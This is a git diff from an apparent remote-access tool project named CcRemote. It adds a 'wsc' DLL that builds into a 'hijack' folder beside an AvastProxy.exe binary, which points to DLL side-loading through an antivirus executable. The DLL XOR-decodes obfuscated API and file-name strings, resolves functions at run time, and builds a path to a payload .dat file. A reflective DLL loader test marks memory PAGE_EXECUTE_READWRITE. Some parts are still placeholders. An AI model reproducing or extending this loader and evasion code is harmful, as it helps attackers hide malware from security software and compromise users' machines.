diff --git a/CcMainDll/.vs/CcMainDll/v15/.suo b/CcMainDll/.vs/CcMainDll/v15/.suo index 4af1ec8..07198b8 100644 Binary files a/CcMainDll/.vs/CcMainDll/v15/.suo and b/CcMainDll/.vs/CcMainDll/v15/.suo differ diff --git a/CcMainDll/CcMainDll.sln b/CcMainDll/CcMainDll.sln index 4515cfc..d36bb73 100644 --- a/CcMainDll/CcMainDll.sln +++ b/CcMainDll/CcMainDll.sln @@ -7,6 +7,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CcMainDll", "CcMainDll\CcMa EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "TestLoadDll", "TestLoadDll\TestLoadDll.vcxproj", "{7FD3FB3F-5E07-4F67-9A94-9A8507044D8B}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "wsc", "wsc\wsc.vcxproj", "{ADC02516-39AD-43DE-95F9-1FC836CD34C3}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 @@ -31,6 +33,14 @@ Global {7FD3FB3F-5E07-4F67-9A94-9A8507044D8B}.Release|x64.Build.0 = Release|x64 {7FD3FB3F-5E07-4F67-9A94-9A8507044D8B}.Release|x86.ActiveCfg = Release|Win32 {7FD3FB3F-5E07-4F67-9A94-9A8507044D8B}.Release|x86.Build.0 = Release|Win32 + {ADC02516-39AD-43DE-95F9-1FC836CD34C3}.Debug|x64.ActiveCfg = Debug|x64 + {ADC02516-39AD-43DE-95F9-1FC836CD34C3}.Debug|x64.Build.0 = Debug|x64 + {ADC02516-39AD-43DE-95F9-1FC836CD34C3}.Debug|x86.ActiveCfg = Debug|Win32 + {ADC02516-39AD-43DE-95F9-1FC836CD34C3}.Debug|x86.Build.0 = Debug|Win32 + {ADC02516-39AD-43DE-95F9-1FC836CD34C3}.Release|x64.ActiveCfg = Release|x64 + {ADC02516-39AD-43DE-95F9-1FC836CD34C3}.Release|x64.Build.0 = Release|x64 + {ADC02516-39AD-43DE-95F9-1FC836CD34C3}.Release|x86.ActiveCfg = Release|Win32 + {ADC02516-39AD-43DE-95F9-1FC836CD34C3}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/CcMainDll/CcMainDll/CcMainDll.vcxproj.user b/CcMainDll/CcMainDll/CcMainDll.vcxproj.user index eb8833a..e5f403d 100644 --- a/CcMainDll/CcMainDll/CcMainDll.vcxproj.user +++ b/CcMainDll/CcMainDll/CcMainDll.vcxproj.user @@ -5,8 +5,9 @@ WindowsLocalDebugger - C:\Windows\SysWOW64\rundll32.exe + ..\..\bin\server\TestLoadDll.exe WindowsLocalDebugger - F:\myapp\CcRemote\bin\server\CcMainDll.dll,MainRun + + \ No newline at end of file diff --git a/CcMainDll/TestLoadDll/Debug/TestLoadDll.Build.CppClean.log b/CcMainDll/TestLoadDll/Debug/TestLoadDll.Build.CppClean.log new file mode 100644 index 0000000..e206c4a --- /dev/null +++ b/CcMainDll/TestLoadDll/Debug/TestLoadDll.Build.CppClean.log @@ -0,0 +1,17 @@ +f:\myapp\ccremote\ccmaindll\testloaddll\debug\vc141.pdb +f:\myapp\ccremote\ccmaindll\testloaddll\debug\vc141.idb +f:\myapp\ccremote\ccmaindll\testloaddll\debug\testloaddll.obj +f:\myapp\ccremote\bin\server\testloaddll.exe +f:\myapp\ccremote\bin\server\testloaddll.ilk +f:\myapp\ccremote\bin\server\testloaddll.pdb +f:\myapp\ccremote\bin\server\testloaddll.ipdb +f:\myapp\ccremote\bin\server\testloaddll.iobj +f:\myapp\ccremote\ccmaindll\testloaddll\..\..\bin\server\testloaddll.exe +f:\myapp\ccremote\ccmaindll\testloaddll\debug\testloaddll.tlog\cl.command.1.tlog +f:\myapp\ccremote\ccmaindll\testloaddll\debug\testloaddll.tlog\cl.read.1.tlog +f:\myapp\ccremote\ccmaindll\testloaddll\debug\testloaddll.tlog\cl.write.1.tlog +f:\myapp\ccremote\ccmaindll\testloaddll\debug\testloaddll.tlog\link.command.1.tlog +f:\myapp\ccremote\ccmaindll\testloaddll\debug\testloaddll.tlog\link.delete.1.tlog +f:\myapp\ccremote\ccmaindll\testloaddll\debug\testloaddll.tlog\link.read.1.tlog +f:\myapp\ccremote\ccmaindll\testloaddll\debug\testloaddll.tlog\link.write.1.tlog +f:\myapp\ccremote\ccmaindll\testloaddll\debug\testloaddll.tlog\testloaddll.write.1u.tlog diff --git a/CcMainDll/TestLoadDll/Debug/TestLoadDll.log b/CcMainDll/TestLoadDll/Debug/TestLoadDll.log index b440f42..667fb10 100644 --- a/CcMainDll/TestLoadDll/Debug/TestLoadDll.log +++ b/CcMainDll/TestLoadDll/Debug/TestLoadDll.log @@ -1,6 +1,6 @@ C:\Program Files (x86)\Microsoft Visual Studio\2017\Professional\Common7\IDE\VC\VCTargets\Microsoft.CppBuild.targets(377,5): warning MSB8004: Output 目录未以斜杠结尾。 此生成实例将添加斜杠,因为必须有这个斜杠才能正确计算 Output 目录。 TestLoadDll.cpp -f:\myapp\ccremote\ccmaindll\testloaddll\testloaddll.cpp(22): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details. +f:\myapp\ccremote\ccmaindll\testloaddll\testloaddll.cpp(23): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details. d:\windows kits\10\include\10.0.17763.0\ucrt\stdio.h(208): note: 参见“fopen”的声明 -f:\myapp\ccremote\ccmaindll\testloaddll\testloaddll.cpp(119): warning C4700: 使用了未初始化的局部变量“lpflOldProtect” +f:\myapp\ccremote\ccmaindll\testloaddll\testloaddll.cpp(124): warning C4700: 使用了未初始化的局部变量“lpflOldProtect” TestLoadDll.vcxproj -> F:\myapp\CcRemote\CcMainDll\TestLoadDll\..\..\bin\server\TestLoadDll.exe diff --git a/CcMainDll/TestLoadDll/Release/TestLoadDll.Build.CppClean.log b/CcMainDll/TestLoadDll/Release/TestLoadDll.Build.CppClean.log index f1eb298..566c1c1 100644 --- a/CcMainDll/TestLoadDll/Release/TestLoadDll.Build.CppClean.log +++ b/CcMainDll/TestLoadDll/Release/TestLoadDll.Build.CppClean.log @@ -1,14 +1 @@ -f:\myapp\ccremote\ccmaindll\testloaddll\release\vc141.pdb -f:\myapp\ccremote\ccmaindll\testloaddll\release\testloaddll.obj -f:\myapp\ccremote\bin\server\testloaddll.exe -f:\myapp\ccremote\bin\server\testloaddll.pdb -f:\myapp\ccremote\bin\server\testloaddll.ipdb -f:\myapp\ccremote\bin\server\testloaddll.iobj f:\myapp\ccremote\ccmaindll\testloaddll\..\..\bin\server\testloaddll.exe -f:\myapp\ccremote\ccmaindll\testloaddll\release\testloaddll.tlog\cl.command.1.tlog -f:\myapp\ccremote\ccmaindll\testloaddll\release\testloaddll.tlog\cl.read.1.tlog -f:\myapp\ccremote\ccmaindll\testloaddll\release\testloaddll.tlog\cl.write.1.tlog -f:\myapp\ccremote\ccmaindll\testloaddll\release\testloaddll.tlog\link.command.1.tlog -f:\myapp\ccremote\ccmaindll\testloaddll\release\testloaddll.tlog\link.read.1.tlog -f:\myapp\ccremote\ccmaindll\testloaddll\release\testloaddll.tlog\link.write.1.tlog -f:\myapp\ccremote\ccmaindll\testloaddll\release\testloaddll.tlog\testloaddll.write.1u.tlog diff --git a/CcMainDll/TestLoadDll/Release/TestLoadDll.log b/CcMainDll/TestLoadDll/Release/TestLoadDll.log index 2271ea3..38a4a3a 100644 --- a/CcMainDll/TestLoadDll/Release/TestLoadDll.log +++ b/CcMainDll/TestLoadDll/Release/TestLoadDll.log @@ -2,8 +2,13 @@ TestLoadDll.cpp f:\myapp\ccremote\ccmaindll\testloaddll\testloaddll.cpp(23): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details. d:\windows kits\10\include\10.0.17763.0\ucrt\stdio.h(208): note: 参见“fopen”的声明 +f:\myapp\ccremote\ccmaindll\testloaddll\testloaddll.cpp(121): warning C4018: “<=”: 有符号/无符号不匹配 +f:\myapp\ccremote\ccmaindll\testloaddll\testloaddll.cpp(123): warning C4267: “=”: 从“size_t”转换到“char”,可能丢失数据 +f:\myapp\ccremote\ccmaindll\testloaddll\testloaddll.cpp(132): warning C4838: 从“int”转换到“char”需要收缩转换 +f:\myapp\ccremote\ccmaindll\testloaddll\testloaddll.cpp(132): warning C4309: “初始化”: 截断常量值 +f:\myapp\ccremote\ccmaindll\testloaddll\testloaddll.cpp(133): warning C4838: 从“int”转换到“char”需要收缩转换 +f:\myapp\ccremote\ccmaindll\testloaddll\testloaddll.cpp(133): warning C4309: “初始化”: 截断常量值 正在生成代码 -f:\myapp\ccremote\ccmaindll\testloaddll\testloaddll.cpp(120): warning C4700: 使用了未初始化的局部变量“lpflOldProtect” - All 161 functions were compiled because no usable IPDB/IOBJ from previous compilation was found. + All 159 functions were compiled because no usable IPDB/IOBJ from previous compilation was found. 已完成代码的生成 TestLoadDll.vcxproj -> F:\myapp\CcRemote\CcMainDll\TestLoadDll\..\..\bin\server\TestLoadDll.exe diff --git a/CcMainDll/TestLoadDll/TestLoadDll.cpp b/CcMainDll/TestLoadDll/TestLoadDll.cpp index 416654f..e5186ce 100644 --- a/CcMainDll/TestLoadDll/TestLoadDll.cpp +++ b/CcMainDll/TestLoadDll/TestLoadDll.cpp @@ -32,6 +32,7 @@ bool InitTestReflectiveLoader() return false; + } @@ -112,9 +113,12 @@ void loadCcmainDllExp() } + + + int main() { - + InitTestReflectiveLoader(); PDWORD lpflOldProtect; VirtualProtect(buffer, lSize, PAGE_EXECUTE_READWRITE, lpflOldProtect); diff --git a/CcMainDll/wsc/Debug/wsc.Build.CppClean.log b/CcMainDll/wsc/Debug/wsc.Build.CppClean.log new file mode 100644 index 0000000..1b77ab9 --- /dev/null +++ b/CcMainDll/wsc/Debug/wsc.Build.CppClean.log @@ -0,0 +1,18 @@ +f:\myapp\ccremote\ccmaindll\wsc\debug\wsc.pch +f:\myapp\ccremote\ccmaindll\wsc\debug\vc141.pdb +f:\myapp\ccremote\ccmaindll\wsc\debug\vc141.idb +f:\myapp\ccremote\ccmaindll\wsc\debug\pch.obj +f:\myapp\ccremote\ccmaindll\wsc\debug\dllmain.obj +f:\myapp\ccremote\bin\hijack\wsc.ilk +f:\myapp\ccremote\bin\hijack\wsc.dll +f:\myapp\ccremote\bin\hijack\wsc.pdb +f:\myapp\ccremote\bin\hijack\wsc.lib +f:\myapp\ccremote\bin\hijack\wsc.exp +f:\myapp\ccremote\ccmaindll\wsc\..\..\bin\hijack\wsc.dll +f:\myapp\ccremote\ccmaindll\wsc\debug\wsc.tlog\cl.command.1.tlog +f:\myapp\ccremote\ccmaindll\wsc\debug\wsc.tlog\cl.read.1.tlog +f:\myapp\ccremote\ccmaindll\wsc\debug\wsc.tlog\cl.write.1.tlog +f:\myapp\ccremote\ccmaindll\wsc\debug\wsc.tlog\link.command.1.tlog +f:\myapp\ccremote\ccmaindll\wsc\debug\wsc.tlog\link.read.1.tlog +f:\myapp\ccremote\ccmaindll\wsc\debug\wsc.tlog\link.write.1.tlog +f:\myapp\ccremote\ccmaindll\wsc\debug\wsc.tlog\wsc.write.1u.tlog diff --git a/CcMainDll/wsc/Debug/wsc.log b/CcMainDll/wsc/Debug/wsc.log new file mode 100644 index 0000000..30edfb5 --- /dev/null +++ b/CcMainDll/wsc/Debug/wsc.log @@ -0,0 +1,13 @@ +C:\Program Files (x86)\Microsoft Visual Studio\2017\Professional\Common7\IDE\VC\VCTargets\Microsoft.CppBuild.targets(377,5): warning MSB8004: Output 目录未以斜杠结尾。 此生成实例将添加斜杠,因为必须有这个斜杠才能正确计算 Output 目录。 + pch.cpp + dllmain.cpp +f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(9): warning C4018: “<=”: 有符号/无符号不匹配 +f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(11): warning C4267: “=”: 从“size_t”转换到“char”,可能丢失数据 +f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(62): warning C4838: 从“int”转换到“char”需要收缩转换 +f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(62): warning C4309: “初始化”: 截断常量值 +f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(63): warning C4838: 从“int”转换到“char”需要收缩转换 +f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(63): warning C4309: “初始化”: 截断常量值 +f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(64): warning C4838: 从“int”转换到“char”需要收缩转换 +f:\myapp\ccremote\ccmaindll\wsc\dllmain.cpp(64): warning C4309: “初始化”: 截断常量值 + 正在创建库 ..\..\bin\hijack\wsc.lib 和对象 ..\..\bin\hijack\wsc.exp + wsc.vcxproj -> F:\myapp\CcRemote\CcMainDll\wsc\..\..\bin\hijack\wsc.dll diff --git a/CcMainDll/wsc/Debug/wsc.tlog/wsc.lastbuildstate b/CcMainDll/wsc/Debug/wsc.tlog/wsc.lastbuildstate new file mode 100644 index 0000000..bd1e4f2 --- /dev/null +++ b/CcMainDll/wsc/Debug/wsc.tlog/wsc.lastbuildstate @@ -0,0 +1,2 @@ +#TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.17763.0 +Debug|Win32|F:\myapp\CcRemote\CcMainDll\| diff --git a/CcMainDll/wsc/Release/wsc.Build.CppClean.log b/CcMainDll/wsc/Release/wsc.Build.CppClean.log new file mode 100644 index 0000000..feb3b92 --- /dev/null +++ b/CcMainDll/wsc/Release/wsc.Build.CppClean.log @@ -0,0 +1,17 @@ +f:\myapp\ccremote\ccmaindll\wsc\release\wsc.pch +f:\myapp\ccremote\ccmaindll\wsc\release\vc141.pdb +f:\myapp\ccremote\ccmaindll\wsc\release\pch.obj +f:\myapp\ccremote\ccmaindll\wsc\release\dllmain.obj +f:\myapp\ccremote\ccmaindll\release\wsc.dll +f:\myapp\ccremote\ccmaindll\release\wsc.pdb +f:\myapp\ccremote\ccmaindll\release\wsc.lib +f:\myapp\ccremote\ccmaindll\release\wsc.exp +f:\myapp\ccremote\ccmaindll\release\wsc.ipdb +f:\myapp\ccremote\ccmaindll\release\wsc.iobj +f:\myapp\ccremote\ccmaindll\wsc\release\wsc.tlog\cl.command.1.tlog +f:\myapp\ccremote\ccmaindll\wsc\release\wsc.tlog\cl.read.1.tlog +f:\myapp\ccremote\ccmaindll\wsc\release\wsc.tlog\cl.write.1.tlog +f:\myapp\ccremote\ccmaindll\wsc\release\wsc.tlog\link.command.1.tlog +f:\myapp\ccremote\ccmaindll\wsc\release\wsc.tlog\link.read.1.tlog +f:\myapp\ccremote\ccmaindll\wsc\release\wsc.tlog\link.write.1.tlog +f:\myapp\ccremote\ccmaindll\wsc\release\wsc.tlog\wsc.write.1u.tlog diff --git a/CcMainDll/wsc/Release/wsc.log b/CcMainDll/wsc/Release/wsc.log new file mode 100644 index 0000000..589efb9 --- /dev/null +++ b/CcMainDll/wsc/Release/wsc.log @@ -0,0 +1,7 @@ + pch.cpp + dllmain.cpp + 正在创建库 F:\myapp\CcRemote\CcMainDll\Release\wsc.lib 和对象 F:\myapp\CcRemote\CcMainDll\Release\wsc.exp + 正在生成代码 + All 6 functions were compiled because no usable IPDB/IOBJ from previous compilation was found. + 已完成代码的生成 + wsc.vcxproj -> F:\myapp\CcRemote\CcMainDll\Release\wsc.dll diff --git a/CcMainDll/wsc/Release/wsc.tlog/wsc.lastbuildstate b/CcMainDll/wsc/Release/wsc.tlog/wsc.lastbuildstate new file mode 100644 index 0000000..3f4a20c --- /dev/null +++ b/CcMainDll/wsc/Release/wsc.tlog/wsc.lastbuildstate @@ -0,0 +1,2 @@ +#TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.17763.0 +Release|Win32|F:\myapp\CcRemote\CcMainDll\| diff --git a/CcMainDll/wsc/dllmain.cpp b/CcMainDll/wsc/dllmain.cpp new file mode 100644 index 0000000..4b16d0f --- /dev/null +++ b/CcMainDll/wsc/dllmain.cpp @@ -0,0 +1,118 @@ +// dllmain.cpp : 定义 DLL 应用程序的入口点。 +#include "pch.h" + +#define STR_CRY_LENGTH 0 //加密字符串的长度 +char* uncode(char* str) +{ + int len = str[0]; + char * uncodeStr = (char *)operator new(len + 1); + for (size_t i = 1; i <= len; i++) + { + uncodeStr[i - 1] = str[i] ^ (0xCC - i); + } + uncodeStr[len] = 0x00; + return uncodeStr; +} + + + +BOOL APIENTRY DllMain( HMODULE hModule, + DWORD ul_reason_for_call, + LPVOID lpReserved + ) +{ + switch (ul_reason_for_call) + { + case DLL_PROCESS_ATTACH: + MessageBoxA(NULL, "dllmain", "test", NULL); + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + case DLL_PROCESS_DETACH: + break; + } + return TRUE; +} + + +extern "C" __declspec(dllexport) void wiohrwiaq () +{ + +} + + +extern "C" __declspec(dllexport) void ioqerbwqiaweplkqpoewq () +{ + +} + +extern "C" __declspec(dllexport) void eiwqiothhahndna() +{ + +} + + +/* +为什么C++生成的Dll函数名带有@?如“_Abcd2@4”后面是数字2加@还有个4 +_stdcall调用约定的函数会有@,后面的数字表示参数总共所占字节数,这是因为_stdcall函数需要被调用者清空堆栈,所以需要知道参数所占大小 +_cedcl调用约定的函数没有@及后面的数字,因为_cedcl调用约定的函数由调用者清空堆栈 +*/ +extern "C" __declspec(dllexport) int __stdcall run(HMODULE hLibModule) +{ + MessageBoxA(NULL, "hello", "test", NULL); + char Str_Kernel32[] = { 0x08,0xa0,0xaf,0xbb,0xa6,0xa2,0xaa,0xf6,0xf6 }; + char Str_GetMoudleFileNameA[] = { 0x12,0x8c,0xaf,0xbd,0x85,0xa8,0xa2,0xb0,0xa8,0xa6,0x84,0xa8,0xac,0xda,0xf0,0xdc,0xd1,0xde,0xfb }; + char Str_MainDat[] = { 0x0c,0x97,0x89,0xaa,0xfa,0xff,0xf4,0xf0,0xf2,0xed,0xa6,0xa0,0xb4 }; + + char SelfPath[MAX_PATH] = { 0 }; + + char* lpKernel32 = uncode(Str_Kernel32); + HMODULE MoudleHandle = GetModuleHandleA(lpKernel32); // 解密调用 + memset(lpKernel32, 0, Str_Kernel32[STR_CRY_LENGTH]); + delete lpKernel32; + + + //声明导出函数类型--导出的TestRun函数 + typedef DWORD(__stdcall *TestRunT)( + _In_opt_ HMODULE hModule, + _Out_writes_to_(nSize, ((return < nSize) ? (return +1) : nSize)) LPSTR lpFilename, + _In_ DWORD nSize + ); + + + char* lpGetMoudleFileName = uncode(Str_GetMoudleFileNameA); + TestRunT pGetMoudleFileNameA = (TestRunT)GetProcAddress(MoudleHandle, lpGetMoudleFileName); // 解密调用 + memset(lpGetMoudleFileName, 0, Str_Kernel32[STR_CRY_LENGTH]); + delete lpGetMoudleFileName; + + + pGetMoudleFileNameA(NULL, SelfPath, MAX_PATH); + + char* FilePath = strrchr(SelfPath, '\\'); + + if (FilePath) + { + *FilePath = 0x00; + } + else + { + return 0; + } + + char* pMainDat = uncode(Str_MainDat); + lstrcatA(SelfPath, pMainDat); + memset(pMainDat, 0, Str_Kernel32[STR_CRY_LENGTH]); + delete pMainDat; + + + MessageBoxA(NULL, SelfPath, "test", NULL); + + + return FreeLibrary(hLibModule); +} + + + +extern "C" __declspec(dllexport) void qioewiqj() +{ + +} diff --git a/CcMainDll/wsc/framework.h b/CcMainDll/wsc/framework.h new file mode 100644 index 0000000..80cbbc9 --- /dev/null +++ b/CcMainDll/wsc/framework.h @@ -0,0 +1,5 @@ +#pragma once + +#define WIN32_LEAN_AND_MEAN // 从 Windows 头文件中排除极少使用的内容 +// Windows 头文件 +#include diff --git a/CcMainDll/wsc/pch.cpp b/CcMainDll/wsc/pch.cpp new file mode 100644 index 0000000..b6fb8f4 --- /dev/null +++ b/CcMainDll/wsc/pch.cpp @@ -0,0 +1,5 @@ +// pch.cpp: 与预编译标头对应的源文件 + +#include "pch.h" + +// 当使用预编译的头时,需要使用此源文件,编译才能成功。 diff --git a/CcMainDll/wsc/pch.h b/CcMainDll/wsc/pch.h new file mode 100644 index 0000000..9660927 --- /dev/null +++ b/CcMainDll/wsc/pch.h @@ -0,0 +1,13 @@ +// pch.h: 这是预编译标头文件。 +// 下方列出的文件仅编译一次,提高了将来生成的生成性能。 +// 这还将影响 IntelliSense 性能,包括代码完成和许多代码浏览功能。 +// 但是,如果此处列出的文件中的任何一个在生成之间有更新,它们全部都将被重新编译。 +// 请勿在此处添加要频繁更新的文件,这将使得性能优势无效。 + +#ifndef PCH_H +#define PCH_H + +// 添加要在此处预编译的标头 +#include "framework.h" + +#endif //PCH_H diff --git a/CcMainDll/wsc/wsc.vcxproj b/CcMainDll/wsc/wsc.vcxproj new file mode 100644 index 0000000..b04e849 --- /dev/null +++ b/CcMainDll/wsc/wsc.vcxproj @@ -0,0 +1,179 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 15.0 + {ADC02516-39AD-43DE-95F9-1FC836CD34C3} + Win32Proj + wsc + 10.0.17763.0 + + + + DynamicLibrary + true + v141 + MultiByte + + + DynamicLibrary + false + v141 + true + MultiByte + + + DynamicLibrary + true + v141 + Unicode + + + DynamicLibrary + false + v141 + true + Unicode + + + + + + + + + + + + + + + + + + + + + false + ..\..\bin\hijack + + + true + ..\..\bin\hijack + + + true + + + false + + + + Use + Level3 + MaxSpeed + true + true + false + WIN32;NDEBUG;WSC_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) + true + pch.h + MultiThreadedDebug + + + Windows + true + true + true + false + ..\..\bin\hijack\wsc.dll + + + + + Use + Level3 + Disabled + false + WIN32;_DEBUG;WSC_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) + true + pch.h + MultiThreadedDebug + + + Windows + true + false + ..\..\bin\hijack\wsc.dll + + + + + Use + Level3 + Disabled + true + _DEBUG;WSC_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) + true + pch.h + + + Windows + true + false + + + + + Use + Level3 + MaxSpeed + true + true + true + NDEBUG;WSC_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) + true + pch.h + + + Windows + true + true + true + false + + + + + + + + + + Create + Create + Create + Create + + + + + + \ No newline at end of file diff --git a/CcMainDll/wsc/wsc.vcxproj.filters b/CcMainDll/wsc/wsc.vcxproj.filters new file mode 100644 index 0000000..330d314 --- /dev/null +++ b/CcMainDll/wsc/wsc.vcxproj.filters @@ -0,0 +1,33 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + 头文件 + + + 头文件 + + + + + 源文件 + + + 源文件 + + + \ No newline at end of file diff --git a/CcMainDll/wsc/wsc.vcxproj.user b/CcMainDll/wsc/wsc.vcxproj.user new file mode 100644 index 0000000..274e26b --- /dev/null +++ b/CcMainDll/wsc/wsc.vcxproj.user @@ -0,0 +1,11 @@ + + + + ..\..\bin\hijack\AvastProxy.exe + WindowsLocalDebugger + + + ..\..\bin\hijack\AvastProxy.exe + WindowsLocalDebugger + + \ No newline at end of file diff --git a/bin/hijack/AvastProxy.exe b/bin/hijack/AvastProxy.exe new file mode 100644 index 0000000..93410f7 Binary files /dev/null and b/bin/hijack/AvastProxy.exe differ diff --git a/bin/hijack/wsc.dll b/bin/hijack/wsc.dll new file mode 100644 index 0000000..bc74589 Binary files /dev/null and b/bin/hijack/wsc.dll differ diff --git a/bin/hijack/wsc.lib b/bin/hijack/wsc.lib new file mode 100644 index 0000000..ee09c7a Binary files /dev/null and b/bin/hijack/wsc.lib differ diff --git a/bin/server/TestLoadDll.exe b/bin/server/TestLoadDll.exe index 1be63e4..5af8813 100644 Binary files a/bin/server/TestLoadDll.exe and b/bin/server/TestLoadDll.exe differ diff --git a/strCodeTest/.vs/strCodeTest/v15/.suo b/strCodeTest/.vs/strCodeTest/v15/.suo new file mode 100644 index 0000000..6b55bbf Binary files /dev/null and b/strCodeTest/.vs/strCodeTest/v15/.suo differ diff --git a/strCodeTest/Debug/strCodeTest.exe b/strCodeTest/Debug/strCodeTest.exe new file mode 100644 index 0000000..ddb99f9 Binary files /dev/null and b/strCodeTest/Debug/strCodeTest.exe differ diff --git a/strCodeTest/strCodeTest.sln b/strCodeTest/strCodeTest.sln new file mode 100644 index 0000000..cb145e9 --- /dev/null +++ b/strCodeTest/strCodeTest.sln @@ -0,0 +1,31 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio 15 +VisualStudioVersion = 15.0.28307.1022 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "strCodeTest", "strCodeTest\strCodeTest.vcxproj", "{BAFA92C5-CDFB-466D-9F8B-8857982F6C9C}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|x64 = Debug|x64 + Debug|x86 = Debug|x86 + Release|x64 = Release|x64 + Release|x86 = Release|x86 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {BAFA92C5-CDFB-466D-9F8B-8857982F6C9C}.Debug|x64.ActiveCfg = Debug|x64 + {BAFA92C5-CDFB-466D-9F8B-8857982F6C9C}.Debug|x64.Build.0 = Debug|x64 + {BAFA92C5-CDFB-466D-9F8B-8857982F6C9C}.Debug|x86.ActiveCfg = Debug|Win32 + {BAFA92C5-CDFB-466D-9F8B-8857982F6C9C}.Debug|x86.Build.0 = Debug|Win32 + {BAFA92C5-CDFB-466D-9F8B-8857982F6C9C}.Release|x64.ActiveCfg = Release|x64 + {BAFA92C5-CDFB-466D-9F8B-8857982F6C9C}.Release|x64.Build.0 = Release|x64 + {BAFA92C5-CDFB-466D-9F8B-8857982F6C9C}.Release|x86.ActiveCfg = Release|Win32 + {BAFA92C5-CDFB-466D-9F8B-8857982F6C9C}.Release|x86.Build.0 = Release|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection + GlobalSection(ExtensibilityGlobals) = postSolution + SolutionGuid = {702339B7-C70C-4AF0-AFEF-5E6AEB03540F} + EndGlobalSection +EndGlobal diff --git a/strCodeTest/strCodeTest/Debug/strCodeTest.Build.CppClean.log b/strCodeTest/strCodeTest/Debug/strCodeTest.Build.CppClean.log new file mode 100644 index 0000000..19cc4a2 --- /dev/null +++ b/strCodeTest/strCodeTest/Debug/strCodeTest.Build.CppClean.log @@ -0,0 +1,12 @@ +f:\myapp\ccremote\strcodetest\strcodetest\debug\vc141.pdb +f:\myapp\ccremote\strcodetest\strcodetest\debug\vc141.idb +f:\myapp\ccremote\strcodetest\strcodetest\debug\strcodetest.obj +f:\myapp\ccremote\strcodetest\debug\strcodetest.ilk +f:\myapp\ccremote\strcodetest\debug\strcodetest.exe +f:\myapp\ccremote\strcodetest\debug\strcodetest.pdb +f:\myapp\ccremote\strcodetest\strcodetest\debug\strcodetest.tlog\cl.command.1.tlog +f:\myapp\ccremote\strcodetest\strcodetest\debug\strcodetest.tlog\cl.read.1.tlog +f:\myapp\ccremote\strcodetest\strcodetest\debug\strcodetest.tlog\cl.write.1.tlog +f:\myapp\ccremote\strcodetest\strcodetest\debug\strcodetest.tlog\link.command.1.tlog +f:\myapp\ccremote\strcodetest\strcodetest\debug\strcodetest.tlog\link.read.1.tlog +f:\myapp\ccremote\strcodetest\strcodetest\debug\strcodetest.tlog\link.write.1.tlog diff --git a/strCodeTest/strCodeTest/Debug/strCodeTest.log b/strCodeTest/strCodeTest/Debug/strCodeTest.log new file mode 100644 index 0000000..a2fd81c --- /dev/null +++ b/strCodeTest/strCodeTest/Debug/strCodeTest.log @@ -0,0 +1,6 @@ + strCodeTest.cpp +f:\myapp\ccremote\strcodetest\strcodetest\strcodetest.cpp(13): warning C4018: “<=”: 有符号/无符号不匹配 +f:\myapp\ccremote\strcodetest\strcodetest\strcodetest.cpp(15): warning C4267: “=”: 从“size_t”转换到“char”,可能丢失数据 +f:\myapp\ccremote\strcodetest\strcodetest\strcodetest.cpp(27): warning C4018: “<=”: 有符号/无符号不匹配 +f:\myapp\ccremote\strcodetest\strcodetest\strcodetest.cpp(29): warning C4267: “=”: 从“size_t”转换到“char”,可能丢失数据 + strCodeTest.vcxproj -> F:\myapp\CcRemote\strCodeTest\Debug\strCodeTest.exe diff --git a/strCodeTest/strCodeTest/Debug/strCodeTest.tlog/strCodeTest.lastbuildstate b/strCodeTest/strCodeTest/Debug/strCodeTest.tlog/strCodeTest.lastbuildstate new file mode 100644 index 0000000..5bbebeb --- /dev/null +++ b/strCodeTest/strCodeTest/Debug/strCodeTest.tlog/strCodeTest.lastbuildstate @@ -0,0 +1,2 @@ +#TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.17763.0 